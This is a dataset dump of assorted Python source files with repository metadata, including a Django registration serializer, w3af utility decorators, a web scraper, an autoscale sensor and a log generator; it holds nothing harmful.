| 32.074074 | 145 | 0.55353 | 1,385 | 12,124 | 4.771841 | 0.228159 | 0.021788 | 0.008473 | 0.009986 | 0.180965 | 0.16417 | 0.12256 | 0.09941 | 0.094114 | 0.081707 | 0 | 0.026231 | 0.336523 | 12,124 | 377 | 146 | 32.159151 | 0.795375 | 0.083636 | 0 | 0.280488 | 0 | 0 | 0.062323 | 0.002474 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.036585 | null | null | 0.028455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95d7e5744ff563f245da9ce3b365c3fc78f0624e | 1,863 | py | Python | Accounts/serializers.py | oluwex/quizApp | 069fbc85f1be8768d121728017d07b2c5b17a3c7 | [
"MIT"
] | null | null | null | Accounts/serializers.py | oluwex/quizApp | 069fbc85f1be8768d121728017d07b2c5b17a3c7 | [
"MIT"
] | null | null | null | Accounts/serializers.py | oluwex/quizApp | 069fbc85f1be8768d121728017d07b2c5b17a3c7 | [
"MIT"
] | null | null | null | from django.contrib.auth import get_user_model
from rest_framework import serializers
User = get_user_model()
# class RegisterSerializer(serializers.Serializer):
class RegisterSerializer(serializers.ModelSerializer):
    """Serializer for user registration with a password-confirmation field.

    email / first_name / last_name come from the User model; password1 and
    password2 are write-only extras that must match.
    """

    # NOTE(review): email uniqueness is not validated explicitly here;
    # presumably the User model's own unique constraint covers it -- confirm.
    password1 = serializers.CharField(
        label='Password',
        min_length=6,
        write_only=True
    )
    password2 = serializers.CharField(
        label='Confirm password',
        min_length=6,
        write_only=True
    )

    class Meta:
        model = User
        fields = ['email', 'first_name', 'last_name', 'password1', 'password2', ]

    def validate_password1(self, password):
        # Drop accidental surrounding whitespace before comparing/storing.
        return password.strip()

    def validate_password2(self, password):
        # Fix: strip here too so validate() compares like with like.
        # Previously only password1 was stripped, so any password typed with
        # surrounding whitespace always failed the confirmation check.
        return password.strip()

    def validate(self, data):
        """Object-level validation: the two password fields must match."""
        if data['password1'] != data['password2']:
            raise serializers.ValidationError('The passwords did not match.')
        return data

    def save(self, **kwargs):
        """Create and return the new user via User.objects.create_user.

        Fix: accepts **kwargs for signature compatibility with
        rest_framework.serializers.Serializer.save().
        """
        validated = self.validated_data
        return User.objects.create_user(
            email=validated.get('email', ''),
            first_name=validated.get('first_name', ''),
            last_name=validated.get('last_name', ''),
            password=validated.get('password1', '')
        )
95dd572af9e83fda3a5895dd0e81d38161367c82 | 5,508 | py | Python | tools/w3af/w3af/core/controllers/misc/decorators.py | sravani-m/Web-Application-Security-Framework | d9f71538f5cba6fe1d8eabcb26c557565472f6a6 | [
"MIT"
] | 3 | 2019-04-09T22:59:33.000Z | 2019-06-14T09:23:24.000Z | tools/w3af/w3af/core/controllers/misc/decorators.py | sravani-m/Web-Application-Security-Framework | d9f71538f5cba6fe1d8eabcb26c557565472f6a6 | [
"MIT"
] | null | null | null | tools/w3af/w3af/core/controllers/misc/decorators.py | sravani-m/Web-Application-Security-Framework | d9f71538f5cba6fe1d8eabcb26c557565472f6a6 | [
"MIT"
] | null | null | null | """
decorators.py
Copyright 2011 Andres Riancho
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import math
import time
import threading
import collections
import functools
from functools import wraps
import w3af.core.controllers.output_manager as om
# pylint: disable=E0401
from darts.lib.utils.lru import SynchronizedLRUDict
# pylint: enable=E0401
def runonce(exc_class=Exception):
"""
Function to decorate methods that should be called only once.
:param exc_class: The Exception class to be raised when the method has
already been called.
"""
def runonce_meth(meth):
@wraps(meth)
def inner_runonce_meth(self, *args):
if not getattr(self, '_already_executed', False):
self._already_executed = True
return meth(self, *args)
raise exc_class()
return inner_runonce_meth
return runonce_meth
def retry(tries, delay=1, backoff=2, exc_class=None, err_msg='', log_msg=None):
"""
Retries a function or method if an exception was raised.
:param tries: Number of attempts. Must be >= 1.
:param delay: Initial delay before retrying. Must be non negative.
:param backoff: Indicates how much the delay should lengthen after
each failure. Must greater than 1.
:param exc_class: Exception class to use if all attempts have been
exhausted.
:param err_msg: Error message to use when an instance of `exc_class`
is raised. If no value is passed the string representation
of the current exception is used.
"""
if backoff <= 1:
raise ValueError("'backoff' must be greater than 1")
tries = math.floor(tries)
if tries < 1:
raise ValueError("'tries' must be 1 or greater.")
if delay < 0:
raise ValueError("'delay' must be non negative.")
def deco_retry(f):
@wraps(f)
def f_retry(*args, **kwargs):
mtries, mdelay = tries - 1, delay
while mtries >= 0:
try:
rv = f(*args, **kwargs)
except Exception, ex:
# Ok, fail!
if mtries == 0:
if exc_class:
raise exc_class(err_msg or str(ex))
raise
else:
return rv
mtries -= 1
time.sleep(mdelay)
mdelay *= backoff
if log_msg is not None:
om.out.debug(log_msg)
return f_retry
return deco_retry
def cached_property(fun):
"""
A memoize decorator for class properties.
"""
@wraps(fun)
def get(self):
try:
return self._cache[fun]
except AttributeError:
self._cache = {}
except KeyError:
pass
ret = self._cache[fun] = fun(self)
return ret
return property(get)
class memoized(object):
"""
Decorator. Caches a function's return value each time it is called.
If called later with the same arguments, the cached value is returned
(not reevaluated).
"""
def __init__(self, func, lru_size=10):
self.func = func
self.cache = SynchronizedLRUDict(lru_size)
def __call__(self, *args, **kwargs):
if not isinstance(args, collections.Hashable) or\
not isinstance(tuple(kwargs.items()), collections.Hashable):
# uncacheable. a list, for instance.
# better to not cache than blow up.
return self.func(*args, **kwargs)
try:
return self.cache[(args, tuple(kwargs.items()))]
except KeyError:
value = self.func(*args, **kwargs)
self.cache[(args, tuple(kwargs.items()))] = value
return value
def __repr__(self):
"""
Return the function's docstring.
"""
return self.func.__doc__
def __get__(self, obj, objtype):
"""
Support instance methods.
"""
return functools.partial(self.__call__, obj)
def rate_limited(max_per_second):
"""
Decorator that make functions not be called faster than
"""
lock = threading.Lock()
min_interval = 1.0 / float(max_per_second)
def decorate(func):
last_time_called = [0.0]
@wraps(func)
def rate_limited_function(*args, **kwargs):
lock.acquire()
elapsed = time.clock() - last_time_called[0]
left_to_wait = min_interval - elapsed
if left_to_wait > 0:
time.sleep(left_to_wait)
lock.release()
ret = func(*args, **kwargs)
last_time_called[0] = time.clock()
return ret
return rate_limited_function
return decorate | 28.6875 | 79 | 0.599129 | 685 | 5,508 | 4.69781 | 0.366423 | 0.019888 | 0.012119 | 0.017713 | 0.043505 | 0.035426 | 0 | 0 | 0 | 0 | 0 | 0.013896 | 0.320625 | 5,508 | 192 | 80 | 28.6875 | 0.846072 | 0.021968 | 0 | 0.073684 | 0 | 0 | 0.031023 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.010526 | 0.084211 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95de8be2ae16bb3cf89080daaf0982e968517d26 | 1,662 | py | Python | Notifier.py | xcollantes/commute-ping | 9b12e490fe17c3533f88ead9c5eee545652feafc | [
"Apache-2.0"
] | null | null | null | Notifier.py | xcollantes/commute-ping | 9b12e490fe17c3533f88ead9c5eee545652feafc | [
"Apache-2.0"
] | null | null | null | Notifier.py | xcollantes/commute-ping | 9b12e490fe17c3533f88ead9c5eee545652feafc | [
"Apache-2.0"
] | null | null | null | """Desktop notification system for commuters.
TODO(xcollantes): DO NOT SUBMIT without a detailed description of Notifier.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import subprocess
import requests
from typing import List
from bs4 import BeautifulSoup as bs4
def CallGoogleMaps(home: str, work: str) -> str:
"""Make HTTP request for Maps data.
Args:
home: Home address as string.
work: Work address as string.
Returns:
Raw HTML data.
Raises:
Connection Error.
"""
host = 'https://google.com/maps/dir'
url = host + '/' + home + '/' + work
response = requests.get(url)
response.raise_for_status()
return response.content
def _parse_maps(html:str):
"""Extract useful data from HTML."""
soupy = bs4(html, 'lxml')
first_drive_time = soupy.select("html/body/jsl/div[3]/div[9]/div[8]/div/div[1]/div/div/div[5]/div[1]/div[2]/div[1]/div[1]/div[1]/span[1]")
#first_drive_time = soupy.select("#section-directions-trip-0 > div.section-directions-trip-description > div:nth-child(1) > div.section-directions-trip-numbers > div.section-directions-trip-duration.delay-medium > span:nth-child(1)")
return first_drive_time
def _format_message(maps_data:List) -> None:
pass
def SendNote(message: str) -> None:
"""Runs the message on desktop, keeps visible for 10 seconds."""
subprocess.run(['notify-send', '--expire-time', '10000', f'{message}'])
def main():
home = ''
work = ''
html_response = CallGoogleMaps(home, work)
print(html_response)
#dict_map_data = _parse_maps(html_response)
SendNote("Test Message.")
main()
| 23.742857 | 235 | 0.708183 | 236 | 1,662 | 4.84322 | 0.474576 | 0.017498 | 0.024497 | 0.062992 | 0.043745 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017058 | 0.15343 | 1,662 | 69 | 236 | 24.086957 | 0.795309 | 0.386883 | 0 | 0 | 0 | 0.035714 | 0.191402 | 0.105425 | 0 | 0 | 0 | 0.014493 | 0 | 1 | 0.178571 | false | 0.035714 | 0.25 | 0 | 0.5 | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95f1aded6d536d23f4607f301e0320036167b1cf | 3,077 | py | Python | src/amira_blender_rendering/scenes/__init__.py | nwaniek/amira_blender_rendering | 4fc971b9e5a0e2f32918baa8353f41ce2ff700b0 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/amira_blender_rendering/scenes/__init__.py | nwaniek/amira_blender_rendering | 4fc971b9e5a0e2f32918baa8353f41ce2ff700b0 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/amira_blender_rendering/scenes/__init__.py | nwaniek/amira_blender_rendering | 4fc971b9e5a0e2f32918baa8353f41ce2ff700b0 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright (c) 2020 - for information on the respective copyright owner
# see the NOTICE file and/or the repository
# <https://github.com/boschresearch/amira-blender-rendering>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The scenes module contains scene managers for various setups."""
# base classes
from .basescenemanager import BaseSceneManager # noqa
from .baseconfiguration import BaseConfiguration # noqa
from .threepointlighting import ThreePointLighting # noqa
# composition classes, if inheritance should or cannot be used
from .rendermanager import RenderManager # noqa
# concrete scenes are autoimported later at the end of the file
import os
from functools import partial
from amira_blender_rendering.cli import _auto_import
_available_scenes = {}
def register(name: str, type: str = None):
"""Register a class/function to the specified available type.
This function should be used as a class decorator:
The name should be unique for the scene type that is being registered.
..code::
@register(name='awesome_sauce', type)
class AnotherClass(MyClass):
def __init__(self, ...)
...
Args:
name(str): Name for the scene to register
type(str): Either 'scene' or 'config' depending wheter the actual scene class
or the corresponding configuration class is registered
Returns:
The class that was passed as argument.
Raises:
ValueError: if invalid name/type given.
"""
def _register(obj, name, obj_type):
if obj_type not in ['scene', 'config']:
raise ValueError(f'Requested type {obj_type} is not available')
if name is None:
raise ValueError(f'Provide an appropriate name for the current scene of type {obj.__name__.lower()}')
if name not in _available_scenes:
_available_scenes[name] = dict()
_available_scenes[name][obj_type] = obj
return obj
return partial(_register, name=name, obj_type=type)
def get_registered(name: str = None):
"""
Return dictionary of available classes/function type registered via register(name, type)
Args:
name(str): name of registered object to query
"""
if name is None:
return _available_scenes
if name not in _available_scenes:
raise ValueError(f'Queried type "{name}" not among availables: {list(_available_scenes.keys())}')
return _available_scenes[name]
_auto_import(pkgname=__name__, dirname=os.path.dirname(__file__), subdirs=[''])
| 34.965909 | 113 | 0.710757 | 411 | 3,077 | 5.206813 | 0.418491 | 0.056075 | 0.015421 | 0.014953 | 0.024299 | 0.024299 | 0 | 0 | 0 | 0 | 0 | 0.003296 | 0.211245 | 3,077 | 87 | 114 | 35.367816 | 0.878451 | 0.550861 | 0 | 0.153846 | 0 | 0 | 0.165741 | 0.042823 | 0 | 0 | 0 | 0 | 0 | 1 | 0.115385 | false | 0 | 0.307692 | 0 | 0.576923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
95f75eaca73ae30c8e035d0f42b380aa62357693 | 588 | py | Python | app/migrations/0002_alter_project_user.py | kibetrono/Django-Awwards | a6b61b1615b333392ec8b671e4c6e58e4619d664 | [
"Unlicense"
] | null | null | null | app/migrations/0002_alter_project_user.py | kibetrono/Django-Awwards | a6b61b1615b333392ec8b671e4c6e58e4619d664 | [
"Unlicense"
] | null | null | null | app/migrations/0002_alter_project_user.py | kibetrono/Django-Awwards | a6b61b1615b333392ec8b671e4c6e58e4619d664 | [
"Unlicense"
] | null | null | null | # Generated by Django 4.0.3 on 2022-03-13 05:59
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('app', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='project',
name='user',
field=models.ForeignKey(blank='True', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| 26.727273 | 135 | 0.668367 | 70 | 588 | 5.5 | 0.614286 | 0.062338 | 0.072727 | 0.114286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.041394 | 0.219388 | 588 | 21 | 136 | 28 | 0.797386 | 0.076531 | 0 | 0 | 1 | 0 | 0.055453 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2501479a85ccb4c675426d7c0a861337fbeba505 | 349 | py | Python | mayan/apps/document_comments/search.py | wan1869/dushuhu | 934dd178e67140cffc6b9203e793fdf8bbc73a54 | [
"Apache-2.0"
] | 1 | 2021-02-24T15:03:23.000Z | 2021-02-24T15:03:23.000Z | mayan/apps/document_comments/search.py | wan1869/dushuhu | 934dd178e67140cffc6b9203e793fdf8bbc73a54 | [
"Apache-2.0"
] | null | null | null | mayan/apps/document_comments/search.py | wan1869/dushuhu | 934dd178e67140cffc6b9203e793fdf8bbc73a54 | [
"Apache-2.0"
] | 1 | 2020-08-09T09:06:59.000Z | 2020-08-09T09:06:59.000Z | from django.utils.translation import ugettext_lazy as _
from mayan.apps.documents.search import document_page_search, document_search
document_page_search.add_model_field(
field='document_version__document__comments__comment',
label=_('Comments')
)
document_search.add_model_field(
field='comments__comment',
label=_('Comments')
)
| 26.846154 | 77 | 0.808023 | 43 | 349 | 6.023256 | 0.488372 | 0.092664 | 0.138996 | 0.146718 | 0.185328 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106017 | 349 | 12 | 78 | 29.083333 | 0.830128 | 0 | 0 | 0.2 | 0 | 0 | 0.223496 | 0.12894 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25054ec2199ade932c6b3968f0314203a2957f72 | 712 | py | Python | test/test_csv_functions.py | mz2449/embryo-analyzer | 4de725be6c8620d40ca36271bb4629e97abb58c8 | [
"MIT"
] | null | null | null | test/test_csv_functions.py | mz2449/embryo-analyzer | 4de725be6c8620d40ca36271bb4629e97abb58c8 | [
"MIT"
] | null | null | null | test/test_csv_functions.py | mz2449/embryo-analyzer | 4de725be6c8620d40ca36271bb4629e97abb58c8 | [
"MIT"
] | null | null | null | import unittest
import csv_functions
class TestCsvFunctions(unittest.TestCase):
def test_open_test_file(self):
expected = [['X', 'Y'], ['0', '0'], ['1', '10'], ['2', '15'], ['3', '50'], ['4', '80'], ['5', '100'],
['6', '80'], ['7', '45'], ['8', '35'], ['9', '15'], ['10', '5']]
actual = csv_functions.csv_open('test_1.csv')
self.assertEqual(expected, actual)
expected = [['X', 'Y'], ['0', '0'], ['1', '20'], ['2', '30'], ['3', '100'], ['4', '160'], ['5', '200'],
['6', '160'], ['7', '90'], ['8', '70'], ['9', '30'], ['10', '10']]
actual = csv_functions.csv_open('test_2.csv')
self.assertEqual(expected, actual)
| 44.5 | 114 | 0.446629 | 93 | 712 | 3.354839 | 0.451613 | 0.115385 | 0.070513 | 0.076923 | 0.49359 | 0.288462 | 0.102564 | 0.102564 | 0 | 0 | 0 | 0.131627 | 0.231742 | 712 | 15 | 115 | 47.466667 | 0.431444 | 0 | 0 | 0.166667 | 0 | 0 | 0.140449 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.083333 | false | 0 | 0.166667 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2507b63b0a2470c16a1151ca0e32b26498a9ea3f | 2,654 | py | Python | Webcast/2015 webcast/2015Webcast1.py | hueyjj/UCSCWebcast | 9c4c94b4dfd453385f8fd3b927cbdc043e2407b3 | [
"Unlicense"
] | null | null | null | Webcast/2015 webcast/2015Webcast1.py | hueyjj/UCSCWebcast | 9c4c94b4dfd453385f8fd3b927cbdc043e2407b3 | [
"Unlicense"
] | null | null | null | Webcast/2015 webcast/2015Webcast1.py | hueyjj/UCSCWebcast | 9c4c94b4dfd453385f8fd3b927cbdc043e2407b3 | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python
import sys, os, time, urllib, urllib.request, shutil, re, lxml, threading, queue, multiprocessing
import hashlib
from bs4 import BeautifulSoup
from urllib.parse import urlparse
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.expected_conditions import staleness_of
# 2015Webcast.py gets all the information for 2016 webcasts in the following format:
# name, youtubeUp, sha256, dir, vidlink
# and stores the information into a csv format in a text file
#TODO youtube-Upload: unlisted, no votes, comments disabled... anything else?
#url = "http://matterhorn2-player-1.lt.ucsc.edu:8080/engage/ui/index.html" #2015
# init()
def init():
# 2016 webcast gallery link
root_url = "http://matterhorn-player-1.lt.ucsc.edu:8080/engage/ui/index.html"
# load chrome webdriver
chrome = webdriver.Chrome()
chrome.get(root_url)
return chrome
# Open next page
def next_page(chrome, wait):
try:
# next button clickable
wait.until(EC.element_to_be_clickable((By.LINK_TEXT, 'Next')))
chrome.find_element_by_link_text("Next").click() # click next button
except Exception as e:
print("next_page error:", e, flush=True)
return 1
else:
return 0
def get_webcast_list(src):
webcastlist = []
html = BeautifulSoup(src, 'lxml')
for table in html.find_all('table'):
for a_tag in table.find_all('a'):
if a_tag.text != "":
# adds (title, link) to webcastlist
title = a_tag.text
link = real_link(a_tag.get('href'))
info = (title, link)
webcastlist.append(info)
return webcastlist
def real_link(suffix):
base_url = "http://matterhorn-player-1.lt.ucsc.edu:8080/engage/ui/"
return base_url + suffix
# main
def main(argv):
chrome = init()
# max time out = 60 seconds
wait = WebDriverWait(chrome, 60)
time.sleep(5)
file = open('links.txt', 'a')
while True:
info = get_webcast_list(chrome.page_source)
for title, link in info:
file.write(title + ', ' + link + '\n')
print('writing...\n' + title + ', ' + link + '\n', flush=True)
if next_page(chrome, wait) == 1:
break;
else:
time.sleep(3)
file.close()
chrome.close()
if __name__ == "__main__":
main(sys.argv[1:])
| 30.159091 | 98 | 0.628862 | 346 | 2,654 | 4.710983 | 0.421965 | 0.03681 | 0.051534 | 0.051534 | 0.083436 | 0.083436 | 0.083436 | 0.083436 | 0.083436 | 0.083436 | 0 | 0.023422 | 0.259985 | 2,654 | 87 | 99 | 30.505747 | 0.806517 | 0.199699 | 0 | 0.036364 | 0 | 0.018182 | 0.095992 | 0 | 0 | 0 | 0 | 0.011494 | 0 | 1 | 0.090909 | false | 0 | 0.163636 | 0 | 0.345455 | 0.036364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25103d94725878101286ec82e7086af94123d276 | 4,625 | py | Python | packs/autoscale/sensors/autoscale_governor_sensor.py | Mattlk13/incubator | 3b6c59116c16b3bafe3bf1119c9cf73774451e36 | [
"Apache-2.0"
] | 31 | 2015-01-25T08:04:02.000Z | 2018-08-30T19:13:40.000Z | packs/autoscale/sensors/autoscale_governor_sensor.py | StorminStanley/st2incubator | 278c3a23d516d76b01c6e47693b41816794cfad6 | [
"Apache-2.0"
] | 58 | 2015-01-10T05:21:08.000Z | 2017-06-14T17:36:04.000Z | packs/autoscale/sensors/autoscale_governor_sensor.py | StorminStanley/st2incubator | 278c3a23d516d76b01c6e47693b41816794cfad6 | [
"Apache-2.0"
] | 33 | 2015-02-03T17:18:28.000Z | 2018-06-16T20:16:04.000Z | import time
import eventlet
import ast
from st2reactor.sensor.base import PollingSensor
__all_ = [
'AutoscaleGovernorSensor'
]
eventlet.monkey_patch(
os=True,
select=True,
socket=True,
thread=True,
time=True)
GROUP_ACTIVE_STATUS = [
'expanding',
'deflating'
]
class AutoscaleGovernorSensor(PollingSensor):
def __init__(self, sensor_service, config=None, poll_interval=60):
super(AutoscaleGovernorSensor, self).__init__(sensor_service=sensor_service,
config=config,
poll_interval=poll_interval)
self._logger = self._sensor_service.get_logger(__name__)
self._kvp_get = self._sensor_service.get_value
self._trigger = {
'expand': 'autoscale.ScaleUpPulse',
'deflate': 'autoscale.ScaleDownPulse'
}
self._bound = {
'expand': 'max',
'deflate': 'min'
}
def setup(self):
pass
def poll(self):
alerting_asgs = []
stable_asgs = []
# Get all the ASG related keys in the Key Store
kvps = self._sensor_service.list_values(local=False, prefix='asg.')
# Sort out which Applications are actively alerting, and which are not.
for kvp in kvps:
if 'active_incident' in kvp.name:
asg_data = kvp.name.split('.')
asg = asg_data[1]
if ast.literal_eval(kvp.value):
alerting_asgs.append(asg)
else:
stable_asgs.append(asg)
# Attempt to determine if an ASG needs to scale up...
for asg in alerting_asgs:
self._process_asg(asg, 'expand')
# ... or down
for asg in stable_asgs:
self._process_asg(asg, 'deflate')
def cleanup(self):
pass
def add_trigger(self, trigger):
pass
def update_trigger(self, trigger):
pass
def remove_trigger(self, trigger):
pass
def _process_asg(self, asg, action):
trigger_type = self._trigger[action]
bound = self._bound[action]
group_status = self._kvp_get('asg.%s.status' % (asg), local=False)
last_event_timestamp = self._kvp_get('asg.%s.last_%s_timestamp' % (asg, action), local=False)
event_delay = self._kvp_get('asg.%s.%s_delay' % (asg, action), local=False)
current_node_count = self._kvp_get('asg.%s.total_nodes' % (asg), local=False)
node_bound = self._kvp_get('asg.%s.%s_nodes' % (asg, bound), local=False)
total_nodes = self._kvp_get('asg.%s.total_nodes' % (asg), local=False)
if group_status in GROUP_ACTIVE_STATUS:
self._logger.info("AutoScaleGovernor: Autoscale group is currently %s. Skipping..." %
(group_status))
return
# ensure we have all the required variables
if last_event_timestamp and event_delay and current_node_count and node_bound and total_nodes:
# See if an ASG is even eligible to be acted upon, min or max.
bound_check = getattr(self, '_%s_bound_check' % bound)(int(node_bound), int(total_nodes))
delay_check = self._event_delay_check(int(last_event_timestamp), int(event_delay))
if bound_check and delay_check:
self._dispatch_trigger(trigger_type, asg)
else:
self._logger.info("AutoScaleGovernor: Not all K/V pairs exist for ASG %s. Skipping..." % asg)
def _event_delay_check(self, last_event_timestamp, event_delay):
check = True if last_event_timestamp + (event_delay * 60) < int(time.time()) else False
return check
def _max_bound_check(self, max_nodes, total_nodes):
"""
Make sure we have not reached the threshold and are not above max_nodes.
We only want to send scale up pulse if we are not above max_nodes threshold.
"""
check = True if total_nodes < max_nodes else False
return check
def _min_bound_check(self, min_nodes, total_nodes):
"""
Make sure we have not reached the min_nodes threshold.
We only want to scale down if current number of nodes is greater than min_nodes.
"""
check = True if total_nodes > min_nodes else False
return check
def _dispatch_trigger(self, trigger, asg):
payload = {
'asg': asg,
}
self._sensor_service.dispatch(trigger=trigger, payload=payload)
| 34.774436 | 105 | 0.604324 | 563 | 4,625 | 4.701599 | 0.264654 | 0.034001 | 0.026445 | 0.029467 | 0.207027 | 0.09218 | 0.05969 | 0.05969 | 0.05969 | 0.05969 | 0 | 0.001869 | 0.30573 | 4,625 | 132 | 106 | 35.037879 | 0.822485 | 0.123459 | 0 | 0.108696 | 0 | 0 | 0.100853 | 0.023332 | 0 | 0 | 0 | 0 | 0 | 1 | 0.130435 | false | 0.054348 | 0.043478 | 0 | 0.228261 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
2513a85a060f63689464484e118cc0d87d6037d8 | 746 | py | Python | generators/usage-generator.py | cmusv-sc/OpenNEX-Team5 | 5e269d85d28e3eb7c6936df3ed22c3aa2f9250f8 | [
"Apache-2.0"
] | null | null | null | generators/usage-generator.py | cmusv-sc/OpenNEX-Team5 | 5e269d85d28e3eb7c6936df3ed22c3aa2f9250f8 | [
"Apache-2.0"
] | null | null | null | generators/usage-generator.py | cmusv-sc/OpenNEX-Team5 | 5e269d85d28e3eb7c6936df3ed22c3aa2f9250f8 | [
"Apache-2.0"
] | null | null | null | import uuid
import datetime
import random
import sys
# Parse CLI arguments: idCount and numOfLines are required, outdir is optional.
args = sys.argv[1:]
if len(args) < 2:
    # Parenthesized print keeps this line valid on both Python 2 and 3.
    print("usage: python usage-generator.py [idCount] [numOfLines] (outdir)")
    sys.exit(1)
OUTDIR = ""
if len(args) > 2:
    # NOTE(review): used as a raw string prefix below, not joined via os.path,
    # so a trailing separator must be supplied by the caller.
    OUTDIR = args[2]
# generate X unique IDs
X = int(args[0])
ids = [str(uuid.uuid4()) for _ in range(X)]
# seed random generator (no argument: seeded from system entropy/time)
random.seed()
# generate Y lines of text; ':' is replaced because it is not a legal
# filename character on Windows
curTime = datetime.datetime.now().isoformat().replace(":", ".")
filename = OUTDIR + "usage-log-" + curTime + ".log"
ENTRIES = int(args[1])
# 'with' guarantees the log file is flushed and closed; the original
# leaked the open handle.
with open(filename, 'w') as logFile:
    for _ in range(ENTRIES):
        # Pick a random ID and log it with the current timestamp,
        # tab-separated, one entry per line.
        uid = random.choice(ids)
        logFile.write(uid + "\t" + datetime.datetime.now().isoformat() + "\n")
print "log generated" | 20.162162 | 73 | 0.672922 | 115 | 746 | 4.365217 | 0.486957 | 0.02988 | 0.035857 | 0.039841 | 0.047809 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018809 | 0.144772 | 746 | 37 | 74 | 20.162162 | 0.768025 | 0.091153 | 0 | 0 | 0 | 0 | 0.145185 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.153846 | null | null | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
